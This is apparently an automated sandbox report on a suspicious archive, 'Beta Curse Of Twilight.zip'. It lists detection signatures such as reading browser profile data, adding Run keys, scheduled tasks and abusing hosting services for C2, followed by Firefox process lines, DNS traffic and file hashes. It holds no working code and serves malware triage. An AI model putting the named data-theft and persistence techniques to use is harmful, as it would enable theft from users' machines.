Analysis Overview
SHA256
ecd7c29e5959cbecb7332114b06956e215b1a5b351f55d95aaa16b514f89385f
Threat Level: Shows suspicious behavior
The file Beta Curse Of Twilight.zip was found to be: Shows suspicious behavior.
Malicious Activity Summary
Reads user/profile data of web browsers
Drops startup file
Loads dropped DLL
Checks computer location settings
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops autorun.inf file
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Creates scheduled task(s)
Enumerates processes with tasklist
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Detects videocard installed
Views/modifies file attributes
Suspicious use of SetWindowsHookEx
Runs net.exe
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-02 22:43
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral5
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
124s
Max time network
164s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1903027113-674645041-2759338396-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.0.2039562987\455464182" -parentBuildID 20221007134813 -prefsHandle 1704 -prefMapHandle 1692 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {019158ec-da5e-4f03-9bcc-f7d97eef9b7f} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 1796 1f29dbf5058 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.1.505514600\1428057295" -parentBuildID 20221007134813 -prefsHandle 2144 -prefMapHandle 2140 -prefsLen 21608 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a54e6628-1c64-4c1b-b63e-703f37437fa8} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 2172 1f28b672e58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.2.806926298\1848200382" -childID 1 -isForBrowser -prefsHandle 2840 -prefMapHandle 2816 -prefsLen 21646 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a3bd9d6-0b95-4228-a63f-2600f37cfc62} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 2912 1f2a1d0b258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.3.567252275\1242879341" -childID 2 -isForBrowser -prefsHandle 3420 -prefMapHandle 3412 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f004befb-b66d-4b22-b683-423506948daf} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 3432 1f28b661f58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.4.812379313\886626858" -childID 3 -isForBrowser -prefsHandle 4724 -prefMapHandle 4712 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {be925ab9-f186-4732-b4db-f9b0525e438e} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 4580 1f2a23fdf58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.5.294450091\1303026960" -childID 4 -isForBrowser -prefsHandle 4832 -prefMapHandle 4836 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0725436-9b41-4953-8af5-6e036dc6656e} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 4824 1f2a425eb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.6.815832330\335564342" -childID 5 -isForBrowser -prefsHandle 5108 -prefMapHandle 5104 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bd44c2b-faee-4327-846e-c27ed37618f6} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 5116 1f2a425ee58 tab
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:49764 | tcp | |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.117.237.239:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 44.237.149.213:443 | shavar.services.mozilla.com | tcp |
| US | 34.149.100.209:443 | firefox.settings.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 8.8.8.8:53 | 213.149.237.44.in-addr.arpa | udp |
| N/A | 127.0.0.1:49770 | tcp | |
| US | 8.8.8.8:53 | www.kurims.kyoto-u.ac.jp | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 8.8.8.8:53 | aomedia.googlesource.com | udp |
| US | 8.8.8.8:53 | code.google.com | udp |
| US | 8.8.8.8:53 | code.l.google.com | udp |
| US | 8.8.8.8:53 | aomedia.googlesource.com | udp |
| US | 8.8.8.8:53 | aomedia.googlesource.com | udp |
| US | 8.8.8.8:53 | code.l.google.com | udp |
| US | 8.8.8.8:53 | lcamtuf.coredump.cx | udp |
| US | 8.8.8.8:53 | source.android.com | udp |
| US | 8.8.8.8:53 | lcamtuf.coredump.cx | udp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | lcamtuf.coredump.cx | udp |
| US | 8.8.8.8:53 | www3.l.google.com | udp |
| US | 8.8.8.8:53 | developer.android.com | udp |
| US | 8.8.8.8:53 | android.googlesource.com | udp |
| US | 8.8.8.8:53 | www.mojohaus.org | udp |
| US | 8.8.8.8:53 | android.googlesource.com | udp |
| US | 8.8.8.8:53 | mojohaus.github.io | udp |
| US | 8.8.8.8:53 | android.googlesource.com | udp |
| US | 8.8.8.8:53 | mojohaus.github.io | udp |
| US | 8.8.8.8:53 | developers.google.com | udp |
| US | 8.8.8.8:53 | beto-core.googlesource.com | udp |
| US | 8.8.8.8:53 | developers.google.com | udp |
| US | 8.8.8.8:53 | beto-core.googlesource.com | udp |
| US | 8.8.8.8:53 | developers.google.com | udp |
| US | 8.8.8.8:53 | beto-core.googlesource.com | udp |
| US | 8.8.8.8:53 | software.blackmagicdesign.com | udp |
| US | 8.8.8.8:53 | www.chromium.org | udp |
| US | 8.8.8.8:53 | software.blackmagicdesign.com | udp |
| US | 8.8.8.8:53 | www.chromium.org | udp |
| US | 8.8.8.8:53 | software.blackmagicdesign.com | udp |
| US | 8.8.8.8:53 | www.chromium.org | udp |
| US | 8.8.8.8:53 | boringssl.googlesource.com | udp |
| US | 8.8.8.8:53 | chromium.googlesource.com | udp |
| US | 8.8.8.8:53 | boringssl.googlesource.com | udp |
| US | 8.8.8.8:53 | chromium.googlesource.com | udp |
| US | 8.8.8.8:53 | boringssl.googlesource.com | udp |
| US | 8.8.8.8:53 | chromium.googlesource.com | udp |
| US | 8.8.8.8:53 | www.daemonology.net | udp |
| US | 8.8.8.8:53 | lxr.mozilla.org | udp |
| US | 8.8.8.8:53 | checkerframework.org | udp |
| US | 8.8.8.8:53 | www.daemonology.net | udp |
| US | 8.8.8.8:53 | checkerframework.org | udp |
| US | 8.8.8.8:53 | crashpad.chromium.org | udp |
| US | 8.8.8.8:53 | ghs.googlehosted.com | udp |
| US | 8.8.8.8:53 | checkerframework.org | udp |
| US | 8.8.8.8:53 | ghs.googlehosted.com | udp |
| US | 8.8.8.8:53 | www.opensource.apple.com | udp |
| US | 8.8.8.8:53 | code.videolan.org | udp |
| US | 8.8.8.8:53 | world-gen.g.aaplimg.com | udp |
| US | 8.8.8.8:53 | code.videolan.org | udp |
| US | 8.8.8.8:53 | world-gen.g.aaplimg.com | udp |
| US | 8.8.8.8:53 | code.videolan.org | udp |
| US | 8.8.8.8:53 | dawn.googlesource.com | udp |
| US | 8.8.8.8:53 | easylist.to | udp |
| US | 8.8.8.8:53 | dawn.googlesource.com | udp |
| US | 8.8.8.8:53 | dawn.googlesource.com | udp |
| US | 8.8.8.8:53 | easylist.to | udp |
| US | 8.8.8.8:53 | eigen.tuxfamily.org | udp |
| US | 8.8.8.8:53 | errorprone.info | udp |
| US | 8.8.8.8:53 | eigen.tuxfamily.org | udp |
| US | 8.8.8.8:53 | errorprone.info | udp |
| US | 8.8.8.8:53 | errorprone.info | udp |
| US | 8.8.8.8:53 | tsuru.kurims.kyoto-u.ac.jp | udp |
| US | 8.8.8.8:53 | eigen.tuxfamily.org | udp |
| US | 8.8.8.8:53 | www.netlib.org | udp |
| US | 8.8.8.8:53 | ffmpeg.org | udp |
| US | 8.8.8.8:53 | ffmpeg.org | udp |
| US | 8.8.8.8:53 | ffmpeg.org | udp |
| US | 8.8.8.8:53 | findbugs.sourceforge.net | udp |
| US | 8.8.8.8:53 | projects.sourceforge.net.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | projects.sourceforge.net.cdn.cloudflare.net | udp |
| US | 8.8.8.8:53 | firebase.google.com | udp |
| US | 8.8.8.8:53 | netlib.org | udp |
| US | 8.8.8.8:53 | tsuru.kurims.kyoto-u.ac.jp | udp |
| US | 8.8.8.8:53 | firebase.google.com | udp |
| US | 8.8.8.8:53 | netlib.org | udp |
| US | 8.8.8.8:53 | firebase.google.com | udp |
| US | 8.8.8.8:53 | www.freetype.org | udp |
| US | 8.8.8.8:53 | www.freetype.org | udp |
| US | 8.8.8.8:53 | www.freetype.org | udp |
| US | 8.8.8.8:53 | fusejs.io | udp |
| US | 8.8.8.8:53 | fusejs.io | udp |
| US | 8.8.8.8:53 | android-gifview.googlecode.com | udp |
| US | 8.8.8.8:53 | googlecode.l.googleusercontent.com | udp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 8.8.8.8:53 | fusejs.io | udp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 8.8.8.8:53 | pki.goog | udp |
| US | 8.8.8.8:53 | harfbuzz.org | udp |
| US | 8.8.8.8:53 | hunspell.sourceforge.net | udp |
| US | 8.8.8.8:53 | harfbuzz.org | udp |
| US | 8.8.8.8:53 | www.ijg.org | udp |
| US | 8.8.8.8:53 | harfbuzz.org | udp |
| US | 8.8.8.8:53 | www.ijg.org | udp |
| US | 8.8.8.8:53 | developer.mozilla.org | udp |
| US | 8.8.8.8:53 | www.ijg.org | udp |
| US | 8.8.8.8:53 | mdn.prod.mdn.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | jinja.palletsprojects.com | udp |
| US | 8.8.8.8:53 | mdn.prod.mdn.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | www.khronos.org | udp |
| US | 8.8.8.8:53 | readthedocs.io | udp |
| US | 8.8.8.8:53 | www.khronos.org | udp |
| US | 8.8.8.8:53 | readthedocs.io | udp |
| US | 8.8.8.8:53 | www.khronos.org | udp |
| US | 8.8.8.8:53 | kotlinlang.org | udp |
| US | 8.8.8.8:53 | ltp.sourceforge.net | udp |
| US | 8.8.8.8:53 | kotlinlang.org | udp |
| US | 8.8.8.8:53 | kotlinlang.org | udp |
| US | 8.8.8.8:53 | brltty.app | udp |
| US | 8.8.8.8:53 | libcxx.llvm.org | udp |
| US | 8.8.8.8:53 | brltty.app | udp |
| US | 8.8.8.8:53 | brltty.app | udp |
| US | 8.8.8.8:53 | libcxxabi.llvm.org | udp |
| US | 8.8.8.8:53 | gitlab.freedesktop.org | udp |
| US | 8.8.8.8:53 | gitlab.freedesktop.org | udp |
| US | 8.8.8.8:53 | gitlab.freedesktop.org | udp |
| US | 8.8.8.8:53 | libevent.org | udp |
| US | 8.8.8.8:53 | libevent.org | udp |
| US | 8.8.8.8:53 | lists.llvm.org | udp |
| US | 8.8.8.8:53 | libevent.org | udp |
| US | 8.8.8.8:53 | lists.llvm.org | udp |
| US | 8.8.8.8:53 | llvm.org | udp |
| US | 8.8.8.8:53 | libpng.org | udp |
| US | 8.8.8.8:53 | llvm.org | udp |
| US | 8.8.8.8:53 | libpng.org | udp |
| US | 8.8.8.8:53 | llvm.org | udp |
| US | 8.8.8.8:53 | libpng.org | udp |
| US | 8.8.8.8:53 | git.gnome.org | udp |
| US | 8.8.8.8:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 8.8.8.8:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 8.8.8.8:53 | www.freedesktop.org | udp |
| US | 8.8.8.8:53 | libusb.org | udp |
| US | 8.8.8.8:53 | annarchy.freedesktop.org | udp |
| US | 8.8.8.8:53 | xmlsoft.org | udp |
| US | 8.8.8.8:53 | annarchy.freedesktop.org | udp |
| US | 8.8.8.8:53 | xmlsoft.org | udp |
| US | 8.8.8.8:53 | www.logilab.org | udp |
| US | 8.8.8.8:53 | xmlsoft.org | udp |
| US | 8.8.8.8:53 | www.7-zip.org | udp |
| US | 8.8.8.8:53 | loadbalancer.scaleway.logilab.fr | udp |
| US | 8.8.8.8:53 | www.7-zip.org | udp |
| US | 8.8.8.8:53 | www.7-zip.org | udp |
| US | 8.8.8.8:53 | loadbalancer.scaleway.logilab.fr | udp |
| US | 8.8.8.8:53 | www.mesa3d.org | udp |
| US | 8.8.8.8:53 | dxr.mozilla.org | udp |
| US | 8.8.8.8:53 | prod.refractr.mozit.cloud | udp |
| US | 8.8.8.8:53 | prod.refractr.mozit.cloud | udp |
| US | 8.8.8.8:53 | searchfox.org | udp |
| US | 8.8.8.8:53 | searchfox.org | udp |
| US | 8.8.8.8:53 | searchfox.org | udp |
| US | 8.8.8.8:53 | www.mozilla.org | udp |
| US | 8.8.8.8:53 | www.nasm.us | udp |
| US | 8.8.8.8:53 | www.mozorg.moz.works | udp |
| US | 8.8.8.8:53 | www.mozorg.moz.works | udp |
| US | 8.8.8.8:53 | sourceware.org | udp |
| US | 8.8.8.8:53 | sourceware.org | udp |
| US | 8.8.8.8:53 | sourceware.org | udp |
| US | 8.8.8.8:53 | www.nasm.us | udp |
| US | 8.8.8.8:53 | cristal.univ-lille.fr | udp |
| US | 8.8.8.8:53 | proxy-inst.lifl.fr | udp |
| US | 8.8.8.8:53 | www.nasm.us | udp |
| US | 8.8.8.8:53 | proxy-inst.lifl.fr | udp |
| US | 8.8.8.8:53 | www.openh264.org | udp |
| US | 8.8.8.8:53 | cisco.github.io | udp |
| US | 8.8.8.8:53 | gitlab.xiph.org | udp |
| US | 8.8.8.8:53 | gitlab.xiph.org | udp |
| US | 8.8.8.8:53 | cisco.github.io | udp |
| US | 8.8.8.8:53 | gitlab.xiph.org | udp |
| US | 8.8.8.8:53 | www.azillionmonkeys.com | udp |
| US | 8.8.8.8:53 | azillionmonkeys.com | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 8.8.8.8:53 | azillionmonkeys.com | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 8.8.8.8:53 | www.dabeaz.com | udp |
| US | 8.8.8.8:53 | polymer-library.polymer-project.org | udp |
| US | 8.8.8.8:53 | www.pylint.org | udp |
| US | 8.8.8.8:53 | www.dabeaz.com | udp |
| US | 8.8.8.8:53 | www.dabeaz.com | udp |
| US | 8.8.8.8:53 | quiche.googlesource.com | udp |
| US | 8.8.8.8:53 | www.pylint.org | udp |
| US | 8.8.8.8:53 | quiche.googlesource.com | udp |
| US | 8.8.8.8:53 | www.pylint.org | udp |
| US | 8.8.8.8:53 | quiche.googlesource.com | udp |
| US | 8.8.8.8:53 | opensource.perlig.de | udp |
| US | 8.8.8.8:53 | skia.org | udp |
| US | 8.8.8.8:53 | perlig.de | udp |
| US | 8.8.8.8:53 | skia.org | udp |
| US | 8.8.8.8:53 | skia.org | udp |
| US | 8.8.8.8:53 | perlig.de | udp |
| US | 8.8.8.8:53 | google.github.io | udp |
| US | 8.8.8.8:53 | google.github.io | udp |
| US | 8.8.8.8:53 | devel.freebsoft.org | udp |
| US | 8.8.8.8:53 | google.github.io | udp |
| US | 8.8.8.8:53 | sqlite.org | udp |
| US | 8.8.8.8:53 | sqlite.org | udp |
| US | 8.8.8.8:53 | devel.freebsoft.org | udp |
| US | 8.8.8.8:53 | sqlite.org | udp |
| US | 8.8.8.8:53 | www.strongtalk.org | udp |
| US | 8.8.8.8:53 | devel.freebsoft.org | udp |
| US | 8.8.8.8:53 | www.strongtalk.org | udp |
| US | 8.8.8.8:53 | www.strongtalk.org | udp |
| US | 8.8.8.8:53 | www.suitable.com | udp |
| US | 8.8.8.8:53 | www.swift.org | udp |
| US | 8.8.8.8:53 | www.suitable.com | udp |
| US | 8.8.8.8:53 | swiftshader.googlesource.com | udp |
| US | 8.8.8.8:53 | www.suitable.com | udp |
| US | 8.8.8.8:53 | swiftshader.googlesource.com | udp |
| US | 8.8.8.8:53 | source.corp.google.com | udp |
| US | 8.8.8.8:53 | swiftshader.googlesource.com | udp |
| US | 8.8.8.8:53 | uberproxy.l.google.com | udp |
| US | 8.8.8.8:53 | pagure.io | udp |
| US | 8.8.8.8:53 | uberproxy.l.google.com | udp |
| US | 8.8.8.8:53 | www.linux-usb.org | udp |
| US | 8.8.8.8:53 | vhost.sourceforge.net | udp |
| US | 8.8.8.8:53 | vhost.sourceforge.net | udp |
| US | 8.8.8.8:53 | pagure.io | udp |
| US | 8.8.8.8:53 | cldr.unicode.org | udp |
| US | 8.8.8.8:53 | mxr.mozilla.org | udp |
| US | 8.8.8.8:53 | pagure.io | udp |
| US | 8.8.8.8:53 | git.linuxtv.org | udp |
| US | 8.8.8.8:53 | valgrind.org | udp |
| US | 8.8.8.8:53 | www.linuxtv.org | udp |
| US | 8.8.8.8:53 | www.linuxtv.org | udp |
| US | 8.8.8.8:53 | webkit.org | udp |
| US | 8.8.8.8:53 | webkit.org | udp |
| US | 8.8.8.8:53 | valgrind.org | udp |
| US | 8.8.8.8:53 | webkit.org | udp |
| US | 8.8.8.8:53 | www.webrtc.org | udp |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 8.8.8.8:53 | valgrind.org | udp |
| US | 8.8.8.8:53 | sourceforge.net | udp |
| US | 8.8.8.8:53 | freedesktop.org | udp |
| US | 8.8.8.8:53 | freedesktop.org | udp |
| US | 8.8.8.8:53 | freedesktop.org | udp |
| US | 8.8.8.8:53 | tukaani.org | udp |
| US | 8.8.8.8:53 | tukaani.org | udp |
| US | 8.8.8.8:53 | tukaani.org | udp |
| US | 8.8.8.8:53 | zlib.net | udp |
| US | 8.8.8.8:53 | zlib.net | udp |
| US | 8.8.8.8:53 | zlib.net | udp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 35.244.181.201:443 | prod.balrog.prod.cloudops.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| GB | 88.221.134.209:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.134.221.88.in-addr.arpa | udp |
| GB | 216.58.212.238:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 216.58.212.238:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r1---sn-4g5ednde.gvt1.com | udp |
| DE | 74.125.162.134:443 | r1---sn-4g5ednde.gvt1.com | tcp |
| US | 8.8.8.8:53 | r1.sn-4g5ednde.gvt1.com | udp |
| US | 8.8.8.8:53 | r1.sn-4g5ednde.gvt1.com | udp |
| DE | 74.125.162.134:443 | r1.sn-4g5ednde.gvt1.com | udp |
| US | 8.8.8.8:53 | 238.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.162.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.117.121.53:443 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\datareporting\glean\pending_pings\37b7968a-dc21-4b74-b5e8-540e81c04b0b
| MD5 | fff93767430d998fa0de77b7ce01450e |
| SHA1 | 552cd33f07e069eba7a4f227b8575b5009e325a6 |
| SHA256 | ae548e4585bbbe0d4acc119167c5e829936da3cb59932e70de2ff74efd691197 |
| SHA512 | 86145ceb0500743b29f5e21ebcab8999b18560faea812b9bd022ed18522d0e7aa4200e3616cdfa67b16dad3b5635257515139f1dc7ad0bd6f2be00777d672daa |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\datareporting\glean\pending_pings\fe9c8353-4fe8-4724-b6dc-b11f8c613623
| MD5 | 8a6ca981d9caa2adc5b7a10aaca5139f |
| SHA1 | 5b44641877c600a13335d956e28e8cd9e0fc8d77 |
| SHA256 | cd26f78cb240d6f2a8b823f3b46bd94cbfabd78f7101972c2acffecd2af210bd |
| SHA512 | 88f1ad722165047bb84a9d192282cdc6e95edb795ea63498e50f528ba0a9e695dc25c5753888443c68b2e667467a476cfdb9325d5dd80a6f7da82447390f6ac2 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\datareporting\glean\db\data.safe.bin
| MD5 | 9dcfdf0d46ffa98355174dda0b40039a |
| SHA1 | c33ae58eb66bfd7415f3dc1d93b74cc11a0d229c |
| SHA256 | 70b2381264a09d027a0a0a21fb76df934b3354596f873c7dab8c4ecae08ae34c |
| SHA512 | 62cb8fa31447e0717fa2b20bb77d7764b3e660e560cda32b0e4f29ada1dfedc0ff8cc71c70a294770ddbadd152a22b6a6630d7c56a125b3a1e108c7665e127d5 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\prefs-1.js
| MD5 | 8fe264f72a0b4d6815d4a7fbfb029297 |
| SHA1 | 2ce5fcf621f20ff9a0281a22f764002091f5dcb9 |
| SHA256 | 67eb0df4e9fa1ce3315665b1fc9222fdc3dfa625210ebd1585dbaf4a5b3fd1a5 |
| SHA512 | 367fb579d30200c55dd1d6903501ea4f62f4b848c0ec15ad39a31d6707b4fc6ccb0e69f57d8fbeac9421ad3998b80add062c0e642590b01a9e34df93416eae47 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\hcue34dg.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 81be40eeb7ce5f36e18daa2eff56fe06 |
| SHA1 | 5205df1bde7d9e24d1f4150288938dfc63aec19d |
